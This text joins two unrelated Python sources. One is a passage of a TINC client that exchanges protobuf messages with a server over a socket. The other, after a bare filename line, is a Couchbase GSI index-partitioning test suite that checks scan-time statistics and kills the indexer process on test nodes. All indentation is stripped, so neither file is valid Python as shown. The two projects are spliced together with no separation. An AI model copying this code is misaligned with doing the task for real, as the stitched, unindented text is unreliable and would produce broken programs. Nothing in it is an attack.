found = False
for proc in self.processors:
if proc.id == proc_id:
if type(proc).__name__ == type(new_processor).__name__:
proc.id = proc_id
proc.input_dir = input_dir
proc.output_dir = output_dir
proc.running_dir = running_dir
print(f"Updated processor '{proc_id}'")
found = True
break
else:
print(f"ERROR processor type mismatch! {proc_id}")
if not found and new_processor:
self.processors.append(new_processor)
#print(f"Registered processor '{proc_id}'")
else:
print("Unexpected payload in Register Processor")
def configure_processor(self, details):
if details.Is(TincProtocol.ConfigureProcessor.DESCRIPTOR):
proc_details = TincProtocol.ConfigureProcessor()
details.Unpack(proc_details)
proc_id = proc_details.id
for proc in self.processors:
if proc.id == proc_id:
proc.configuration.update({proc_details.configurationKey: proc_details.configurationValue})
def processor_update(self, client_address: str , address: str, *args: List[Any]):
name = args[0]
config_key = args[1]
config_value = args[2]
for proc in self.processors:
if proc.id == name:
proc.configuration[config_key] = config_value
print(f"Config [{config_key}] = {config_value}")
def _register_datapool_from_message(self, details):
if details.Is(TincProtocol.RegisterDataPool.DESCRIPTOR):
dp_details = TincProtocol.RegisterDataPool()
details.Unpack(dp_details)
dp_id = dp_details.id
ps_id = dp_details.parameterSpaceId
slice_cache_dir = dp_details.cacheDirectory
# print(f"Register Datapool {dp_id}")
found = False
for dp in self.datapools:
if dp.id == dp_id:
if self.debug:
print(f"DataPool already registered: '{dp_id}'")
found = True
break
if not found:
ps = self.get_parameter_space(ps_id)
new_datapool = DataPool(dp_id, ps, slice_cache_dir, tinc_client=self)
self.datapools.append(new_datapool)
else:
print("Unexpected payload in Register Datapool")
def configure_datapool(self, details):
if details.Is(TincProtocol.ConfigureDataPool.DESCRIPTOR):
dp_details = TincProtocol.ConfigureDataPool()
details.Unpack(dp_details)
dp_id = dp_details.id
for dp in self.datapools:
if dp.id == dp_id:
if dp_details.configurationKey == TincProtocol.DataPoolConfigureType.SLICE_CACHE_DIR:
if dp_details.configurationValue.Is(TincProtocol.ParameterValue.DESCRIPTOR):
value = TincProtocol.ParameterValue()
dp_details.configurationValue.Unpack(value)
dp.slice_cache_dir = value.valueString
else:
print("Unexpected payload in Configure Datapool")
# Disk buffer messages ------------------
def register_disk_buffer(self, db):
# TODO is this enough checking, or should we check for ids as well?
if db in self.disk_buffers:
return db
self.disk_buffers.append(db)
self._register_disk_buffer_on_server(db)
def _register_disk_buffer_from_message(self, details):
if details.Is(TincProtocol.RegisterDiskBuffer.DESCRIPTOR):
db_details = TincProtocol.RegisterDiskBuffer()
details.Unpack(db_details)
disk_buffer_id = db_details.id
found = False
for db in self.disk_buffers:
if db.id == disk_buffer_id:
if self.debug:
if not db_details.type == db.type:
print(f"DiskBuffer registered: '{disk_buffer_id}' ERROR: type mismatch")
else:
print(f"DiskBuffer already registered: '{disk_buffer_id}'")
found = True
break
if not found:
new_db = None
distributed_path = db_details.path
if db_details.type == TincProtocol.JSON:
new_db = DiskBufferJson(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
elif db_details.type == TincProtocol.NETCDF:
new_db = DiskBufferNetCDFData(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
elif db_details.type == TincProtocol.IMAGE:
new_db = DiskBufferImage(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
elif db_details.type == TincProtocol.BINARY:
new_db = DiskBufferBinary(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
elif db_details.type == TincProtocol.TEXT:
new_db = DiskBufferText(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
if new_db is not None:
self.disk_buffers.append(new_db)
else:
self._log.append("Disk buffer type not recognized. Not creating DiskBuffer")
else:
print("Unexpected payload in Register DiskBuffer")
def _register_disk_buffer_on_server(self, db):
details = TincProtocol.RegisterDiskBuffer()
details.id = db.id
if type(db) == DiskBufferImage:
details.type = TincProtocol.IMAGE
elif type(db) == DiskBufferJson:
details.type = TincProtocol.JSON
elif type(db) == DiskBufferNetCDFData:
details.type = TincProtocol.NETCDF
elif type(db) == DiskBufferText:
details.type = TincProtocol.TEXT
elif type(db) == DiskBufferBinary:
details.type = TincProtocol.BINARY
else:
print("Unsupported Diskbuffer type. Not registered on server.")
return
details.path.filename = db.get_base_filename()
details.path.relativePath = db.get_relative_path()
details.path.rootPath = db.get_root_path()
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.MessageType.REGISTER
msg.objectType = TincProtocol.ObjectType.DISK_BUFFER
msg.details.Pack(details)
self._send_message(msg)
db.tinc_client = self
def configure_disk_buffer(self, details):
if self.debug:
print("Processing Configure disk buffer")
if details.Is(TincProtocol.ConfigureDiskBuffer.DESCRIPTOR):
db_details = TincProtocol.ConfigureDiskBuffer()
details.Unpack(db_details)
db_id = db_details.id
for db in self.disk_buffers:
if db.id == db_id:
if db_details.configurationKey == TincProtocol.DiskBufferConfigureType.CURRENT_FILE:
if db_details.configurationValue.Is(TincProtocol.ParameterValue.DESCRIPTOR):
value = TincProtocol.ParameterValue()
db_details.configurationValue.Unpack(value)
if value.valueString == '':
db._data = None
db._filename = ''
else:
db.load_data(value.valueString, False)
else:
print("Unexpected payload in Configure Datapool")
def send_disk_buffer_current_filename(self, disk_buffer, filename):
if not self.connected:
return
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.DISK_BUFFER
config = TincProtocol.ConfigureDiskBuffer()
config.id = disk_buffer.id
config.configurationKey = TincProtocol.DiskBufferConfigureType.CURRENT_FILE
value = TincProtocol.ParameterValue()
value.valueString = filename
config.configurationValue.Pack(value)
msg.details.Pack(config)
print("sent disk buffer filename: " + filename)
self._send_message(msg)
# ------------------------------------------------------
def _process_object_command_reply(self, message):
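# Match the reply to its pending request via message_id: pop the entry from pending_requests and hand the payload back through pending_replies for _wait_for_reply to pick up.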
command_details = TincProtocol.Command()
self._log.append("Reply")
if message.details.Is(TincProtocol.Command.DESCRIPTOR):
message.details.Unpack(command_details)
message_id = command_details.message_id
# TODO we should verify the object id somehow
if self.debug:
print(f"**** Got reply for id {message_id} before lock")
try:
with self.pending_requests_lock:
if self.debug:
print(f"**** Got reply for id {message_id} after lock")
self._log.append(f"Got reply for id {message_id}")
command_data = self.pending_requests.pop(message_id)
with self.pending_lock:
self.pending_replies[message_id] = [command_details.details, command_data]
except KeyError:
print(f"Unexpected command reply: {message_id}")
else:
self._log.append("Unsupported payload in Command reply")
print("Unsupported payload in Command reply")
def _process_register_command(self, message):
if self.debug:
print(f"_process_register_command {message.objectType}")
if message.objectType == TincProtocol.ObjectType.PARAMETER:
self._register_parameter_from_message(message.details)
elif message.objectType == TincProtocol.ObjectType.PROCESSOR:
self.register_processor(message.details)
elif message.objectType == TincProtocol.ObjectType.DISK_BUFFER:
self._register_disk_buffer_from_message(message.details)
elif message.objectType == TincProtocol.ObjectType.DATA_POOL:
self._register_datapool_from_message(message.details)
elif message.objectType == TincProtocol.ObjectType.PARAMETER_SPACE:
self._register_parameter_space_from_message(message.details)
else:
print("Unexpected Register command")
def _process_request_command(self, message):
pass
def _process_remove_command(self, message):
pass
def _process_configure_command(self, message):
if self.debug:
print(f"_process_configure_command {message.objectType}")
if message.objectType == TincProtocol.PARAMETER:
self._configure_parameter_from_message(message.details)
elif message.objectType == TincProtocol.PROCESSOR:
self.configure_processor(message.details)
elif message.objectType == TincProtocol.DISK_BUFFER:
self.configure_disk_buffer(message.details)
elif message.objectType == TincProtocol.DATA_POOL:
self.configure_datapool(message.details)
elif message.objectType == TincProtocol.PARAMETER_SPACE:
self._configure_parameter_space_from_message(message.details)
else:
print("Unexpected Configure command")
def _process_command_command(self, message):
# TODO implement
pass
def _process_ping_command(self, message):
# TODO implement
pass
def _process_pong_command(self, message):
# TODO implement
pass
def _process_barrier_request(self, message):
command_details = TincProtocol.Command()
if message.details.Is(TincProtocol.Command.DESCRIPTOR):
message.details.Unpack(command_details)
with self._barrier_queues_lock:
print(f"_process_barrier_request added barrier {command_details.message_id}")
self._barrier_requests.append(command_details.message_id)
def _process_barrier_unlock(self, message):
command_details = TincProtocol.Command()
if message.details.Is(TincProtocol.Command.DESCRIPTOR):
message.details.Unpack(command_details)
with self._barrier_queues_lock:
print(f"_process_barrier_unlock added barrier unlock {command_details.message_id}")
self._barrier_unlocks.append(command_details.message_id)
def _process_status(self, message):
details = message.details
if details.Is(TincProtocol.StatusMessage.DESCRIPTOR):
status_details = TincProtocol.StatusMessage()
details.Unpack(status_details)
self._server_status = status_details.status
def _process_working_path(self, message):
details = message.details
if details.Is(TincProtocol.TincPath.DESCRIPTOR):
path_details = TincProtocol.TincPath()
details.Unpack(path_details)
self._working_path = path_details.path
print("Set working path to " + self._working_path)
# Send request commands
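# Note: an empty ObjectId appears to act as a wildcard, asking the server to send back all objects of the given type.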
def request_parameters(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.PARAMETER
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def request_processors(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.PROCESSOR
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def request_disk_buffers(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.DISK_BUFFER
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def request_data_pools(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.DATA_POOL
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def request_parameter_spaces(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.PARAMETER_SPACE
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def _get_command_id(self):
self.request_count_lock.acquire()
command_id = self.pending_requests_count
self.pending_requests_count += 1
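# Wrap the counter before it exceeds 2^32 - 1 (message_id is assumed to be a 32-bit unsigned field on the wire).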
if self.pending_requests_count == 4294967295:
self.pending_requests_count = 0
self.request_count_lock.release()
return command_id
def _wait_for_reply(self, request_number, timeout_sec= 30):
start_time = time.time()
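# Poll pending_replies under the lock, releasing it between checks so the receive thread can deliver the reply; give up with TincTimeout after timeout_sec.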
self.pending_lock.acquire()
while not request_number in self.pending_replies:
self.pending_lock.release()
time.sleep(0.05)
if (time.time() - start_time) > timeout_sec:
raise TincTimeout("Timeout.")
self.pending_lock.acquire()
reply = self.pending_replies.pop(request_number)
self.pending_lock.release()
return reply
def _command_parameter_choice_elements(self, parameter, timeout=30):
parameter_addr = parameter.get_osc_address()
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.PARAMETER
command = TincProtocol.Command()
command.id.id = parameter_addr
request_number = self._get_command_id()
command.message_id = request_number
slice_details = TincProtocol.ParameterRequestChoiceElements()
command.details.Pack(slice_details)
msg.details.Pack(command)
# TODO check possible race condition in pending_requests count. Does the GIL make it safe?
self.pending_requests[request_number] = [parameter]
self._send_message(msg)
if self.debug:
print(f"Sent command: {request_number}")
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.ParameterRequestChoiceElementsReply.DESCRIPTOR):
slice_reply = TincProtocol.ParameterRequestChoiceElementsReply()
command_details.Unpack(slice_reply)
print(slice_reply.elements)
user_data[0].set_elements(slice_reply.elements)
def _command_parameter_space_get_current_relative_path(self, ps, timeout=30):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.PARAMETER_SPACE
command = TincProtocol.Command()
command.id.id = ps.id
request_number = self._get_command_id()
command.message_id = request_number
slice_details = TincProtocol.ParameterSpaceRequestCurrentPath()
command.details.Pack(slice_details)
msg.details.Pack(command)
# TODO check possible race condition in pending_requests count. Does the GIL make it safe?
self.pending_requests[request_number] = [ps]
self._send_message(msg)
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.ParameterSpaceRequestCurrentPathReply.DESCRIPTOR):
slice_reply = TincProtocol.ParameterSpaceRequestCurrentPathReply()
command_details.Unpack(slice_reply)
return slice_reply.path
def _command_parameter_space_get_root_path(self, ps, timeout=30):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.PARAMETER_SPACE
command = TincProtocol.Command()
command.id.id = ps.id
request_number = self._get_command_id()
command.message_id = request_number
slice_details = TincProtocol.ParameterSpaceRequestRootPath()
command.details.Pack(slice_details)
msg.details.Pack(command)
# TODO check possible race condition in pending_requests count. Does the GIL make it safe?
self.pending_requests[request_number] = [ps]
self._send_message(msg)
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.ParameterSpaceRequestRootPathReply.DESCRIPTOR):
slice_reply = TincProtocol.ParameterSpaceRequestRootPathReply()
command_details.Unpack(slice_reply)
return slice_reply.path
def _command_datapool_slice_file(self, datapool_id, field, sliceDimensions, timeout=30):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.DATA_POOL
command = TincProtocol.Command()
command.id.id = datapool_id
command.message_id = self._get_command_id()
request_number = command.message_id
slice_details = TincProtocol.DataPoolCommandSlice()
slice_details.field = field
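# sliceDimensions may be given as a single dimension name or as a list of names.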
if type(sliceDimensions) == str:
slice_details.dimension[:] = [sliceDimensions]
elif type(sliceDimensions) == list and len(sliceDimensions) > 0:
for dim in sliceDimensions:
slice_details.dimension.append(dim)
command.details.Pack(slice_details)
msg.details.Pack(command)
if self.debug:
print(f"command datapools send command {command.message_id}")
# TODO check possible race condition in pending_requests count
self.pending_requests[command.message_id] = [datapool_id]
self._send_message(msg)
# print(f"Sent command: {request_number}")
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.DataPoolCommandSliceReply.DESCRIPTOR):
slice_reply = TincProtocol.DataPoolCommandSliceReply()
command_details.Unpack(slice_reply)
return slice_reply.filename
else:
return None
def _command_datapool_get_files(self, datapool_id, timeout=30):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.DATA_POOL
command = TincProtocol.Command()
command.id.id = datapool_id
command.message_id = self._get_command_id()
request_number = command.message_id
command_details = TincProtocol.DataPoolCommandCurrentFiles()
command.details.Pack(command_details)
msg.details.Pack(command)
# TODO check possible race condition in pending_requests count
if self.debug:
print(f"command datapools send command {command.message_id}")
self.pending_requests[command.message_id] = [datapool_id]
self._send_message(msg)
if self.debug:
print(f"Sent datapool get files command: {request_number}")
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.DataPoolCommandCurrentFilesReply.DESCRIPTOR):
command_reply = TincProtocol.DataPoolCommandCurrentFilesReply()
command_details.Unpack(command_reply)
return command_reply.filenames
else:
return None
def synchronize(self):
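# Request every object type from the server so the local registries mirror the server state; called automatically after a successful handshake.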
self.send_metadata()
self.request_parameters()
self.request_parameter_spaces()
self.request_processors()
self.request_disk_buffers()
self.request_data_pools()
def send_goodbye(self):
if not self.connected:
return
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.GOODBYE
tp.objectType = TincProtocol.GLOBAL
self._send_message(tp)
def _process_goodbye(self, client_address=None, address: str = '', *args: List[Any]):
# TODO we need to define behavior. Should client stay alive and then
# restore the state on the server if it comes up again?
print("Got GOODBYE message, stopping TincClient")
self.stop()
def _send_message(self, msg):
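# Wire format: an 8-byte native size_t length header (struct format 'N') followed by the serialized protobuf payload. The receive loop in _server_thread_function unpacks the same header.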
size = msg.ByteSize()
ser_size = struct.pack('N', size)
if not self.socket:
if self.debug:
print("No server connected. Message not sent")
return
try:
num_bytes = self.socket.send(ser_size + msg.SerializeToString())
if self.debug:
print(f'message sent {num_bytes} bytes')
except BrokenPipeError as e:
# Disconnect
self.running = False
self.connected = False
self.x.join()
self.socket.close()
self.socket = None
print("Broken pipe to server. Client is disconnected")
if self.debug:
print(e.strerror)
# Server ---------------
def _server_thread_function(self, ip: str, port: int):
# print("Starting on port " + str(port))
al_message = b''
pc_message = TincProtocol.TincMessage()
failed_attempts = 0
while self.running:
if not self.connected:
self.socket = None
try:
# Attempt a connection
if failed_attempts == 1:
if self.debug:
print(f"Attempt connection. {ip}:{port}")
failed_attempts += 1
if failed_attempts == 100:
print("Connection failed.")
self.stop()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(True)
s.connect((ip, port))
except:
# Connection was not possible, try later
time.sleep(1.0)
continue
s.settimeout(10.0)
if self.debug:
print("Connected, sending handshake.")
hs_message = bytearray()
hs_message.append(commands['HANDSHAKE'])
hs_message += struct.pack("L", tinc_client_version)
hs_message += struct.pack("L", tinc_client_revision)
s.send(hs_message)
hs_message = Message(s.recv(5))
command = hs_message.get_byte()
if command == commands['HANDSHAKE_ACK']:
self.server_version = 0
self.server_revision = 0
if len(hs_message.remaining_bytes()) > 3:
self.server_version = hs_message.get_uint16()
if len(hs_message.remaining_bytes()) > 1:
self.server_revision = hs_message.get_uint16()
if self.server_version != tinc_client_version:
raise ValueError("Tinc protocol version mismatch")
if self.server_revision != tinc_client_revision:
print("WARNING: protocol revision mismatch")
self.connected = True
self.socket = s
failed_attempts = 0
self.synchronize()
print(f"Connected to {ip}:{port}. Server version {self.server_version} revision {self.server_revision}")
else:
print("Expected HANDSHAKE_ACK. CLosing connection. Got {message[0]}")
else:
new_message = b''
try:
new_message = self.socket.recv(1024)
except ConnectionResetError:
print("Connection closed.")
self.socket = None
self.connected = False
except ConnectionAbortedError:
print("Connection closed.")
self.connected = False
except socket.timeout:
continue
al_message = al_message + new_message
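# Process as many complete frames as are buffered; a frame is the 8-byte length header plus that many payload bytes.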
while len(al_message) > 8:
message_size = struct.unpack("N", al_message[:8])[0]
if self.debug:
print(f'received raw {message_size}')
if len(al_message) < message_size + 8:
break
num_bytes = pc_message.ParseFromString(al_message[8:8+message_size])
#print(f'unpacked {num_bytes}')
if num_bytes > 0:
if self.debug:
print(f"Processing message bytes:{num_bytes}")
if pc_message.messageType == TincProtocol.REQUEST:
self._process_request_command(pc_message)
elif pc_message.messageType == TincProtocol.REMOVE:
self._process_remove_command(pc_message)
elif pc_message.messageType == TincProtocol.REGISTER:
self._process_register_command(pc_message)
elif pc_message.messageType == TincProtocol.CONFIGURE:
self._process_configure_command(pc_message)
elif pc_message.messageType == TincProtocol.COMMAND:
self._process_command_command(pc_message)
elif pc_message.messageType == TincProtocol.COMMAND_REPLY:
self._process_object_command_reply(pc_message)
elif pc_message.messageType == TincProtocol.PING:
self._process_ping_command(pc_message)
elif pc_message.messageType == TincProtocol.PONG:
self._process_pong_command(pc_message)
elif pc_message.messageType == TincProtocol.GOODBYE:
self._process_goodbye(pc_message)
elif pc_message.messageType == TincProtocol.BARRIER_REQUEST:
self._process_barrier_request(pc_message)
elif pc_message.messageType == TincProtocol.BARRIER_UNLOCK:
self._process_barrier_unlock(pc_message)
elif pc_message.messageType == TincProtocol.STATUS:
self._process_status(pc_message)
elif pc_message.messageType == TincProtocol.TINC_WORKING_PATH:
self._process_working_path(pc_message)
else:
print("Unknown message")
al_message = al_message[message_size + 8:]
if self.debug:
print(f"Processed Byte_size {message_size}:{pc_message.ByteSize()}" )
else:
break
print("Closed TINC client")
def send_metadata(self):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.TINC_CLIENT_METADATA
msg.objectType = TincProtocol.GLOBAL
metadata = TincProtocol.ClientMetaData()
metadata.clientHost = socket.gethostname()
msg.details.Pack(metadata)
self._send_message(msg)
def print(self):
# print("Print")
if self.socket:
print("TINC Server")
if self.connected:
print("CONNECTED")
for param in self.parameters:
param.print()
for ps in self.parameter_spaces:
ps.print()
for db in self.disk_buffers:
db.print()
for p in self.processors:
p.print()
for dp in self.datapools:
dp.print()
elif self.running:
print("Attempting to connect to app. App is not reponding.")
else:
print("NOT CONNECTED")
else:
print("NOT CONNECTED")
gsi_index_partitioning.py
import copy
import json
import threading
import time
from .base_gsi import BaseSecondaryIndexingTests
from membase.api.rest_client import RestConnection, RestHelper
import random
from lib import testconstants
from lib.couchbase_helper.tuq_generators import TuqGenerators
from lib.memcached.helper.data_helper import MemcachedClientHelper
from lib.remote.remote_util import RemoteMachineShellConnection
from threading import Thread
from pytests.query_tests_helper import QueryHelperTests
from couchbase_helper.documentgenerator import JsonDocGenerator
from couchbase_helper.cluster import Cluster
from .gsi_replica_indexes import GSIReplicaIndexesTests
from lib.membase.helper.cluster_helper import ClusterOperationHelper
class GSIIndexPartitioningTests(GSIReplicaIndexesTests):
def setUp(self):
super(GSIIndexPartitioningTests, self).setUp()
self.num_items = self.input.param("items", 5000)
self.log.info("No. of items: {0}".format(str(self.num_items)))
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
self.rest = RestConnection(self.index_servers[0])
self.node_list = []
for server in self.index_servers:
self.node_list.append(server.ip + ":" + server.port)
self.num_queries = self.input.param("num_queries", 100)
self.num_index_partitions = self.input.param("num_index_partitions", 8)
self.recover_failed_node = self.input.param("recover_failed_node",
False)
self.op_type = self.input.param("op_type", "create")
self.node_operation = self.input.param("node_op", "reboot")
self.implicit_use_index = self.input.param("implicit_use_index", False)
self.use_replica_index = self.input.param("use_replica_index", False)
self.failover_index = self.input.param("failover_index", False)
self.index_partitioned = self.input.param('index_partitioned', False)
def tearDown(self):
super(GSIIndexPartitioningTests, self).tearDown()
'''Test that checks if the last_known_scan_time stat is being set properly
- Test explicitly calling a specific index to see if it is updated
- Test implicitly calling a specific index to see if it is updated
- Test if the stat persists after an indexer crash'''
def test_index_last_query_stat(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
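# Shorten the stats persistence interval and restart the indexer, presumably so the new setting takes effect before the scan-time checks below.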
doc = {"indexer.statsPersistenceInterval": 60}
rest.set_index_settings_internal(doc)
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
self.sleep(30)
if self.index_partitioned:
create_index_query = "CREATE INDEX idx on default(age) partition by hash(name) USING GSI"
else:
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertEqual(indexes['default'][index]['last_known_scan_time'], 0)
else:
continue
# Implicitly or Explicitly use the index in question
if self.implicit_use_index:
use_index_query = 'select * from default where age > 50'
else:
use_index_query = 'select * from default USE INDEX (idx using GSI) where age > 50'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
used_index = 'idx'
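# last_known_scan_time appears to be reported with sub-second precision, so only its leading 10 digits (the seconds portion) are compared against the current epoch time.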
for index_node in indexer_nodes:
rest = RestConnection(index_node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
if index == used_index:
self.log.info(int(str(indexes['default'][index]['last_known_scan_time'])[:10]))
self.assertTrue(current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60, 'The timestamp is more than a minute off')
if self.failover_index:
self.sleep(60)
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
self.sleep(30)
break
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
continue
if self.failover_index:
for index_node in indexer_nodes:
rest = RestConnection(index_node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
if index == used_index:
self.log.info(int(str(indexes['default'][index]['last_known_scan_time'])[:10]))
self.assertTrue(
current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 180,
'The timestamp is more than three minutes off')
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
continue
'''Same as the test above for partitioned indexes'''
def test_index_last_query_stat_partitioned(self):
create_index_query = "CREATE INDEX idx on default(age) partition by hash(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertEqual(indexes['default'][index]['last_known_scan_time'], 0)
else:
continue
# Implicitly or Explicitly use the index in question
if self.implicit_use_index:
use_index_query = 'select * from default where age > 50'
else:
use_index_query = 'select * from default USE INDEX (idx using GSI) where age > 50'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
used_index = 'idx'
for index_node in indexer_nodes:
rest = RestConnection(index_node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
if index == used_index:
self.assertTrue(current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60, 'The timestamp is more than a minute off')
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
continue
'''Test that equivalent indexes/replicas are being updated properly, if you specifically use an index any of
its equivalent indexes can be used, however both should not be used'''
def test_index_last_query_stat_equivalent_indexes(self):
if not self.use_replica_index:
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
create_index_query3 = "CREATE INDEX idx3 ON default(age) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
else:
create_index_query = "CREATE INDEX idx ON default(age) USING GSI WITH {'num_replica': 1};"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertEqual(indexes['default'][index]['last_known_scan_time'], 0)
else:
continue
use_index_query = 'select * from default USE INDEX (idx using GSI) where age > 50'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
check_idx = False
check_idx3 = False
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
if self.use_replica_index:
if index == 'idx':
if current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60:
check_idx = True
elif index == 'idx (replica 1)':
if current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60:
check_idx3 = True
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
if index == 'idx':
if current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60:
check_idx = True
elif index == 'idx3':
if current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60:
check_idx3 = True
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
continue
# One or the other should have been used, not both
self.assertTrue(check_idx or check_idx3)
self.assertFalse(check_idx and check_idx3)
